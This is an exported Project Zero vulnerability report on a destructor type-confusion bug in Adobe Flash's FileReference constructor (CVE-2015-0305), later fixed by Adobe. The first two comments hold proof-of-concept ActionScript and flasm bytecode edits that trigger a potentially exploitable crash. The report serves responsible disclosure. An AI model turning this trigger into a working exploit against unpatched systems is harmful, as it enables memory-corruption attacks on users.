File Reference Object Constructor Does Not Clear Destructor

[GoogleCodeExporter]

When a file reference object is created, the type and user data of the object 
are set, but the destructor function is not cleared. This means that if the 
file reference object is constructed with a 'this' object that already has a 
destructor, it will get called on the wrong type of data when the object is 
destroyed, leading to native method calls on an object of the wrong type, which 
is usually exploitable.

A sample SWF is attached, it works as follows:

1) Pressing the full blue square on the left of the attached SWF will cause a 
FileReferenceList to be created. After it is created, the FileReference 
constructor is overwritten as follows:

var b = flash.net;
b.FileReference = q;

This code overwrites the FileReference constructor with method q.

2) browse() is then called on the FileReferenceList, causing a file selection 
dialog to be spawned

3) If the user selects a file, the function q will be called to construct a 
FileReference to hold the file the user selected. q is defined as:

this.f = flash.display.BitmapData
var c = new this.f(1000, 1000, true, 1000)

Note that Flash CS3 doesn't build this code as expected, and I had to manually 
correct a few actions in the SWF.

Calling this method causes the this object passed into the constructor to be 
initialized as type BitmapData, which sets the BitmapData destructor. After the 
method is exited, the browse function sets the type of the returned object to 
be a FileReferenceObject, but doesn't clear the destructor.

4) A crash will occur when GC happens, the button on the right of the poc can 
be used to trigger GC with limited reliability if the crash doesn't happen 
right away.

POC SWF is attached. This issue is marked as moderate, as 
FileReferenceList.browse always requires user interaction.

Original issue reported on code.google.com by natashe...@google.com on 30 Oct 2014 at 11:00

Attachments:

• fdestroy9.swf

[GoogleCodeExporter]

Adding some extra info.

This issue occurred in Flash 15.0.0.189 in FF and IE. I could not get the issue 
to work in Chrome.

POC code is attached, but note that this code needs to be modified after it is 
compiled for the SWF to work. To get the working SWF:

1) Compile the attached code, and disassemble the output SWF using flasm 
(http://www.nowrap.de/flasm)

flasm Untitled-1.swf -d > test.flm

2) Open test.flm, and find function2 q (). Delete the following four actions 
(the last four actions in the function):

        setRegister r:2
        pop
        push r:this
        trace

So that q is defined as:

    function2 () (r:1='this')
      function2 q () (r:1='this')
        push 'in FR costructor', r:this, '__flavorStr'
        getMember
        add
        trace
        push r:this
        trace
        push r:this, 'f', 'flash'
        getVariable
        push 'display'
        getMember
        push 'BitmapData'
        getMember
        setMember
        push r:this, 'f'
        getMember
        trace
        push 1000, TRUE, 1000, 1000, 4, r:this, 'f'
        newMethod
      end // of function q

3) Recompile the SWF: flasm -a test.flm

Original comment by natashe...@google.com on 3 Nov 2014 at 11:27

Attachments:

• test.as
• Untitled-1.fla

[GoogleCodeExporter]

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without 
a broadly available patch, then the bug report will automatically become 
visible to the public.

Original comment by cev...@google.com on 4 Nov 2014 at 2:05

[GoogleCodeExporter]

Original comment by cev...@google.com on 4 Nov 2014 at 2:05

• Added labels: Reported-2014-Nov-3
• Removed labels: Reported-2014-Oct-30

[GoogleCodeExporter]

Original comment by cev...@google.com on 4 Nov 2014 at 6:21

• Added labels: Id-3120

[GoogleCodeExporter]

Original comment by cev...@google.com on 10 Jan 2015 at 3:25

• Added labels: CVE-2015-0305

[GoogleCodeExporter]

Fixed: http://helpx.adobe.com/security/products/flash-player/apsb15-01.html

Original comment by cev...@google.com on 14 Jan 2015 at 12:51

• Added labels: Fixed-2015-Jan-13

[GoogleCodeExporter]

Original comment by cev...@google.com on 14 Jan 2015 at 12:53

• Changed state: Fixed

[GoogleCodeExporter]

Issue has now been fixed for 7+ days, so opening up for public view.

Original comment by cev...@google.com on 26 Jan 2015 at 5:47

• Removed labels: Restrict-View-Commit